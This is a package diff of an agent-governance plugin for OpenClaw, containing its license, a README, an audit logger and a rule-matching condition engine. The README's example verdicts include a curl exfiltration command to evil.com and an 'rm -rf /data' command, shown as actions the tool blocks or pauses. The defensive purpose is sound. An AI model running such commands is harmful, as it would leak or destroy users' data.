@neuroverseos/governance 0.1.0

package/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2026 NeuroVerseOS
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

package/README.md

@@ -0,0 +1,198 @@
+# NeuroVerseOS — Governance Kernel for OpenClaw
+
+NeuroVerseOS is a deterministic governance kernel for autonomous agents running in OpenClaw.
+
+It compiles your `.md` agent files into a structured World File and enforces invariants, guards, rules, and role-based authority on every tool call.
+
+No AI calls during enforcement. No network requests. Same world + same event = same verdict.
+
+## What NeuroVerseOS Does
+
+NeuroVerseOS introduces structured, enforceable governance to agent systems.
+
+It ensures that:
+
+- Global constraints cannot be silently weakened
+- Role-based authority is enforced at runtime
+- World updates require explicit human approval
+- Governance integrity is verified on every tool call
+- All decisions are auditable
+
+This is not prompt filtering. This is runtime constitutional enforcement.
+
+## Governance Model
+
+NeuroVerseOS enforces governance across four layers:
+
+1. **Invariants** — Unbreakable global constraints
+2. **Guards** — Conditional limits requiring review
+3. **Rules** — Context-aware evaluation logic
+4. **Roles** — Delegated authority bound to agent identities
+
+Role permissions are enforced inside world-level invariants. Delegated authority can never override global constraints.
+
+## Governance Lifecycle
+
+World updates follow a mandatory approval flow:
+
+```
+ACTIVE → PENDING → APPROVED → ACTIVE
+```
+
+- `/world bootstrap` creates a pending world
+- `/world diff` shows structured changes
+- `/world approve` activates it
+- Critical changes require explicit confirmation
+
+No world change activates silently.
+
+## Installation
+
+```bash
+openclaw plugins install @neuroverseos/governance
+```
+
+For local development:
+
+```bash
+openclaw plugins install -l .
+```
+
+If OpenClaw runs on a VPS, install the plugin on that server.
+
+## Storage Model
+
+NeuroVerseOS stores governance state per OpenClaw workspace in:
+
+```
+.neuroverseos/
+```
+
+This directory contains:
+
+- `world.json`
+- `world.meta.json`
+- `audit.jsonl`
+- `state.json`
+- `proposals/`
+
+No global hidden state. Each workspace maintains independent governance.
+
+## Quick Start
+
+Inside your OpenClaw workspace:
+
+```
+/world bootstrap
+/world diff
+/world approve
+```
+
+This compiles your `.md` agent files into a structured World File and activates governance.
+
+## Runtime Enforcement
+
+Every tool call passes through a deterministic evaluation pipeline:
+
+1. **Invariants** (BLOCK)
+2. **Guards** (PAUSE or BLOCK)
+3. **Rules** (context-aware verdict)
+4. **Role constraints**
+5. **Default** (ALLOW)
+
+**Example BLOCK:**
+
+```
+[governance] BLOCK  shell → curl https://evil.com/exfil
+             invariant: no-data-exfiltration
+```
+
+**Example PAUSE:**
+
+```
+[governance] PAUSE  shell → rm -rf /data
+             guard: destructive_shell_requires_approval
+             Allow? [y]es / [a]lways / [n]o
+```
+
+All verdicts are logged to `.neuroverseos/audit.jsonl`.
+
+## Runtime Integrity Verification
+
+Before evaluating rules, NeuroVerseOS verifies system integrity:
+
+| Check | Behavior |
+|-------|----------|
+| World hash verification | BLOCK if modified outside approval pipeline |
+| World missing detection | BLOCK if world deleted |
+| Pending world reminder | Warn once per session |
+| Source drift detection | Warn if `.md` files changed since bootstrap |
+
+Critical failures fail closed.
+
+**Example tamper detection:**
+
+```
+[!!!] World file integrity check failed.
+→ Run /world restore
+```
+
+## Agent Identity → Role Binding
+
+Each OpenClaw agent (`ctx.agentId`) is explicitly bound to a governance role.
+
+Roles define:
+
+- `canDo`
+- `cannotDo`
+- `requiresApproval`
+
+Bindings are stored in `world.meta.json` and follow the same approval lifecycle as world changes.
+
+Role enforcement is deterministic and runtime-verified.
+
+## Drift Detection
+
+NeuroVerseOS tracks divergence between your `.md` source files and the active World File.
+
+If drift is detected:
+
+- `/world status` shows changed files
+- You are prompted to regenerate
+- Governance never updates silently
+
+## Composable Governance
+
+Worlds are composable.
+
+You can import or compose governance modules (e.g., operational safety, budget controls, strategy models) into a single enforceable World File.
+
+All compositions generate a pending world and require approval.
+
+## Commands
+
+| Command | Description |
+|---------|-------------|
+| `/world bootstrap` | Compile `.md` files into pending world |
+| `/world status` | View governance + integrity state |
+| `/world diff` | Compare pending vs active |
+| `/world approve` | Activate pending world |
+| `/world reject` | Discard pending changes |
+| `/world history` | View past versions |
+| `/world rollback <N>` | Restore previous version |
+| `/world restore` | Recover from tampering |
+| `/world bind <agent> <role>` | Bind agent to role |
+| `/world bindings` | View agent-role bindings |
+
+## Design Principles
+
+- Deterministic runtime enforcement
+- Fail-closed integrity model
+- Explicit human approval for world changes
+- Role-based delegated authority
+- Per-workspace deterministic storage
+- No network calls during enforcement
+
+## License
+
+MIT

package/dist/audit-logger.d.ts

@@ -0,0 +1,38 @@
+/**
+ * Audit Logger — Append-only JSONL governance log
+ *
+ * Every verdict logged. Every PAUSE paired with a decision.
+ * Every entry references a ruleId. /world status reads this for drift metrics.
+ *
+ * Format: .neuroverseos/audit.jsonl — one JSON object per line.
+ */
+import type { AuditEntry, AuditDecisionEntry, GovernanceVerdict } from './types';
+export declare class AuditLogger {
+    private logPath;
+    constructor(logPath: string);
+    /**
+     * Log a governance verdict. Returns the event ID for pairing with decisions.
+     * Includes agentId for provenance tracking and severity for audit analysis.
+     */
+    logVerdict(tool: string, intent: string, verdict: GovernanceVerdict, agentId?: string): string;
+    /**
+     * Log a PAUSE decision (allow-once, allow-always, deny).
+     * Paired with the original verdict by event ID.
+     */
+    logDecision(eventId: string, decision: 'allow-once' | 'allow-always' | 'deny'): void;
+    /**
+     * Read all audit entries (for drift analysis / status command).
+     */
+    readAll(): Array<AuditEntry | AuditDecisionEntry>;
+    /**
+     * Count entries by status (for quick stats).
+     */
+    getCounts(): {
+        total: number;
+        allow: number;
+        pause: number;
+        block: number;
+    };
+    private append;
+}
+//# sourceMappingURL=audit-logger.d.ts.map

package/dist/audit-logger.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"audit-logger.d.ts","sourceRoot":"","sources":["../audit-logger.ts"],"names":[],"mappings":"AAAA;;;;;;;GAOG;AAIH,OAAO,KAAK,EAAE,UAAU,EAAE,kBAAkB,EAAE,iBAAiB,EAAE,MAAM,SAAS,CAAC;AASjF,qBAAa,WAAW;IACtB,OAAO,CAAC,OAAO,CAAS;gBAEZ,OAAO,EAAE,MAAM;IAQ3B;;;OAGG;IACH,UAAU,CAAC,IAAI,EAAE,MAAM,EAAE,MAAM,EAAE,MAAM,EAAE,OAAO,EAAE,iBAAiB,EAAE,OAAO,CAAC,EAAE,MAAM,GAAG,MAAM;IAiB9F;;;OAGG;IACH,WAAW,CAAC,OAAO,EAAE,MAAM,EAAE,QAAQ,EAAE,YAAY,GAAG,cAAc,GAAG,MAAM,GAAG,IAAI;IAWpF;;OAEG;IACH,OAAO,IAAI,KAAK,CAAC,UAAU,GAAG,kBAAkB,CAAC;IAajD;;OAEG;IACH,SAAS,IAAI;QAAE,KAAK,EAAE,MAAM,CAAC;QAAC,KAAK,EAAE,MAAM,CAAC;QAAC,KAAK,EAAE,MAAM,CAAC;QAAC,KAAK,EAAE,MAAM,CAAA;KAAE;IAY3E,OAAO,CAAC,MAAM;CAOf"}

package/dist/audit-logger.js

@@ -0,0 +1,100 @@
+"use strict";
+/**
+ * Audit Logger — Append-only JSONL governance log
+ *
+ * Every verdict logged. Every PAUSE paired with a decision.
+ * Every entry references a ruleId. /world status reads this for drift metrics.
+ *
+ * Format: .neuroverseos/audit.jsonl — one JSON object per line.
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.AuditLogger = void 0;
+const fs_1 = require("fs");
+const path_1 = require("path");
+let eventCounter = 0;
+function nextEventId() {
+    eventCounter++;
+    return `ev-${String(eventCounter).padStart(3, '0')}`;
+}
+class AuditLogger {
+    constructor(logPath) {
+        this.logPath = logPath;
+        const dir = (0, path_1.dirname)(logPath);
+        if (!(0, fs_1.existsSync)(dir)) {
+            (0, fs_1.mkdirSync)(dir, { recursive: true });
+        }
+    }
+    /**
+     * Log a governance verdict. Returns the event ID for pairing with decisions.
+     * Includes agentId for provenance tracking and severity for audit analysis.
+     */
+    logVerdict(tool, intent, verdict, agentId) {
+        const id = nextEventId();
+        const entry = {
+            ts: Date.now(),
+            id,
+            tool,
+            intent,
+            status: verdict.status,
+            ruleId: verdict.ruleId,
+            evidence: verdict.evidence,
+            agentId,
+            severity: verdict.severity,
+        };
+        this.append(entry);
+        return id;
+    }
+    /**
+     * Log a PAUSE decision (allow-once, allow-always, deny).
+     * Paired with the original verdict by event ID.
+     */
+    logDecision(eventId, decision) {
+        const entry = {
+            ts: Date.now(),
+            id: eventId,
+            type: 'decision',
+            decision,
+            decidedAt: Date.now(),
+        };
+        this.append(entry);
+    }
+    /**
+     * Read all audit entries (for drift analysis / status command).
+     */
+    readAll() {
+        if (!(0, fs_1.existsSync)(this.logPath))
+            return [];
+        try {
+            const raw = (0, fs_1.readFileSync)(this.logPath, 'utf-8');
+            return raw
+                .split('\n')
+                .filter(line => line.trim())
+                .map(line => JSON.parse(line));
+        }
+        catch {
+            return [];
+        }
+    }
+    /**
+     * Count entries by status (for quick stats).
+     */
+    getCounts() {
+        const entries = this.readAll().filter((e) => !('type' in e && e.type === 'decision'));
+        return {
+            total: entries.length,
+            allow: entries.filter(e => e.status === 'ALLOW').length,
+            pause: entries.filter(e => e.status === 'PAUSE').length,
+            block: entries.filter(e => e.status === 'BLOCK').length,
+        };
+    }
+    append(entry) {
+        try {
+            (0, fs_1.appendFileSync)(this.logPath, JSON.stringify(entry) + '\n');
+        }
+        catch {
+            // Silent failure — don't crash enforcement on log write failure
+        }
+    }
+}
+exports.AuditLogger = AuditLogger;
+//# sourceMappingURL=audit-logger.js.map

package/dist/audit-logger.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"audit-logger.js","sourceRoot":"","sources":["../audit-logger.ts"],"names":[],"mappings":"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"}

package/dist/condition-engine.d.ts

@@ -0,0 +1,16 @@
+/**
+ * Condition Engine — Structured operator evaluation
+ *
+ * Replaces string.includes(pattern) with a real operator engine.
+ * These operators mirror the Experience Space rule compiler — same
+ * vocabulary across all three players.
+ *
+ * Deterministic. No AI. No network. Sub-millisecond per evaluation.
+ */
+import type { Condition, ConditionResult, ToolCallEvent } from './types';
+/**
+ * Evaluate a single condition against a tool call event.
+ * Returns whether it matched and what evidence was found.
+ */
+export declare function evaluateCondition(condition: Condition, event: ToolCallEvent): ConditionResult;
+//# sourceMappingURL=condition-engine.d.ts.map

package/dist/condition-engine.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"condition-engine.d.ts","sourceRoot":"","sources":["../condition-engine.ts"],"names":[],"mappings":"AAAA;;;;;;;;GAQG;AAEH,OAAO,KAAK,EAAE,SAAS,EAAE,eAAe,EAAE,aAAa,EAAE,MAAM,SAAS,CAAC;AAiCzE;;;GAGG;AACH,wBAAgB,iBAAiB,CAC/B,SAAS,EAAE,SAAS,EACpB,KAAK,EAAE,aAAa,GACnB,eAAe,CAgDjB"}

package/dist/condition-engine.js

@@ -0,0 +1,186 @@
+"use strict";
+/**
+ * Condition Engine — Structured operator evaluation
+ *
+ * Replaces string.includes(pattern) with a real operator engine.
+ * These operators mirror the Experience Space rule compiler — same
+ * vocabulary across all three players.
+ *
+ * Deterministic. No AI. No network. Sub-millisecond per evaluation.
+ */
+Object.defineProperty(exports, "__esModule", { value: true });
+exports.evaluateCondition = evaluateCondition;
+// ────────────────────────────────────────────────────────────────────────
+// Field Resolution
+// ────────────────────────────────────────────────────────────────────────
+/**
+ * Resolve a field path from the event.
+ * Supports top-level fields and nested args (e.g. "args.command", "args.file_path").
+ */
+function getFieldValue(event, field) {
+    if (field.startsWith('args.')) {
+        const key = field.slice(5);
+        return event.args?.[key];
+    }
+    return event[field];
+}
+/**
+ * Coerce a field value to string for text operations.
+ * Objects/arrays are JSON-stringified. Nullish becomes empty string.
+ */
+function toString(value) {
+    if (value === null || value === undefined)
+        return '';
+    if (typeof value === 'string')
+        return value;
+    if (typeof value === 'number' || typeof value === 'boolean')
+        return String(value);
+    return JSON.stringify(value);
+}
+// ────────────────────────────────────────────────────────────────────────
+// Core Evaluator
+// ────────────────────────────────────────────────────────────────────────
+/**
+ * Evaluate a single condition against a tool call event.
+ * Returns whether it matched and what evidence was found.
+ */
+function evaluateCondition(condition, event) {
+    const fieldValue = getFieldValue(event, condition.field);
+    // Missing field never matches (except != which is debatable — we treat missing as no-match)
+    if (fieldValue === undefined && condition.operator !== '!=') {
+        return { matched: false, evidence: null };
+    }
+    switch (condition.operator) {
+        case '==':
+            return evaluateEquals(fieldValue, condition.value);
+        case '!=':
+            return evaluateNotEquals(fieldValue, condition.value);
+        case '>':
+            return evaluateComparison(fieldValue, condition.value, (a, b) => a > b);
+        case '<':
+            return evaluateComparison(fieldValue, condition.value, (a, b) => a < b);
+        case '>=':
+            return evaluateComparison(fieldValue, condition.value, (a, b) => a >= b);
+        case '<=':
+            return evaluateComparison(fieldValue, condition.value, (a, b) => a <= b);
+        case 'in':
+            return evaluateIn(fieldValue, condition.value);
+        case 'contains':
+            return evaluateContains(fieldValue, condition.value);
+        case 'contains_any':
+            return evaluateContainsAny(fieldValue, condition.value);
+        case 'matches_pattern':
+            return evaluateMatchesPattern(fieldValue, condition.value);
+        case 'starts_with':
+            return evaluateStartsWith(fieldValue, condition.value);
+        case 'ends_with':
+            return evaluateEndsWith(fieldValue, condition.value);
+        default:
+            return { matched: false, evidence: null };
+    }
+}
+// ────────────────────────────────────────────────────────────────────────
+// Operator Implementations
+// ────────────────────────────────────────────────────────────────────────
+function evaluateEquals(fieldValue, conditionValue) {
+    const fieldStr = toString(fieldValue);
+    const condStr = toString(conditionValue);
+    const matched = fieldStr === condStr;
+    return {
+        matched,
+        evidence: matched ? `${fieldStr} == ${condStr}` : null,
+    };
+}
+function evaluateNotEquals(fieldValue, conditionValue) {
+    const fieldStr = toString(fieldValue);
+    const condStr = toString(conditionValue);
+    const matched = fieldStr !== condStr;
+    return {
+        matched,
+        evidence: matched ? `${fieldStr} != ${condStr}` : null,
+    };
+}
+function evaluateComparison(fieldValue, conditionValue, comparator) {
+    const a = Number(fieldValue);
+    const b = Number(conditionValue);
+    if (isNaN(a) || isNaN(b))
+        return { matched: false, evidence: null };
+    const matched = comparator(a, b);
+    return {
+        matched,
+        evidence: matched ? `${a} compared to ${b}` : null,
+    };
+}
+function evaluateIn(fieldValue, conditionValue) {
+    if (!Array.isArray(conditionValue))
+        return { matched: false, evidence: null };
+    const fieldStr = toString(fieldValue);
+    const matched = conditionValue.some(v => toString(v) === fieldStr);
+    return {
+        matched,
+        evidence: matched ? `"${fieldStr}" found in [${conditionValue.join(', ')}]` : null,
+    };
+}
+function evaluateContains(fieldValue, conditionValue) {
+    const fieldStr = toString(fieldValue).toLowerCase();
+    const searchStr = toString(conditionValue).toLowerCase();
+    const matched = fieldStr.includes(searchStr);
+    return {
+        matched,
+        evidence: matched ? `"${searchStr}" found in field` : null,
+    };
+}
+function evaluateContainsAny(fieldValue, conditionValue) {
+    if (!Array.isArray(conditionValue))
+        return { matched: false, evidence: null };
+    const fieldStr = toString(fieldValue).toLowerCase();
+    for (const pattern of conditionValue) {
+        const patternLower = toString(pattern).toLowerCase();
+        if (fieldStr.includes(patternLower)) {
+            return {
+                matched: true,
+                evidence: `"${patternLower}" found in field`,
+            };
+        }
+    }
+    return { matched: false, evidence: null };
+}
+function evaluateMatchesPattern(fieldValue, conditionValue) {
+    const fieldStr = toString(fieldValue);
+    const patterns = Array.isArray(conditionValue) ? conditionValue : [toString(conditionValue)];
+    for (const pattern of patterns) {
+        try {
+            const regex = new RegExp(toString(pattern), 'i');
+            if (regex.test(fieldStr)) {
+                return {
+                    matched: true,
+                    evidence: `matched pattern /${pattern}/`,
+                };
+            }
+        }
+        catch {
+            // Invalid regex — skip silently (don't crash enforcement)
+            continue;
+        }
+    }
+    return { matched: false, evidence: null };
+}
+function evaluateStartsWith(fieldValue, conditionValue) {
+    const fieldStr = toString(fieldValue).toLowerCase();
+    const prefix = toString(conditionValue).toLowerCase();
+    const matched = fieldStr.startsWith(prefix);
+    return {
+        matched,
+        evidence: matched ? `field starts with "${prefix}"` : null,
+    };
+}
+function evaluateEndsWith(fieldValue, conditionValue) {
+    const fieldStr = toString(fieldValue).toLowerCase();
+    const suffix = toString(conditionValue).toLowerCase();
+    const matched = fieldStr.endsWith(suffix);
+    return {
+        matched,
+        evidence: matched ? `field ends with "${suffix}"` : null,
+    };
+}
+//# sourceMappingURL=condition-engine.js.map

package/dist/condition-engine.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"condition-engine.js","sourceRoot":"","sources":["../condition-engine.ts"],"names":[],"mappings":"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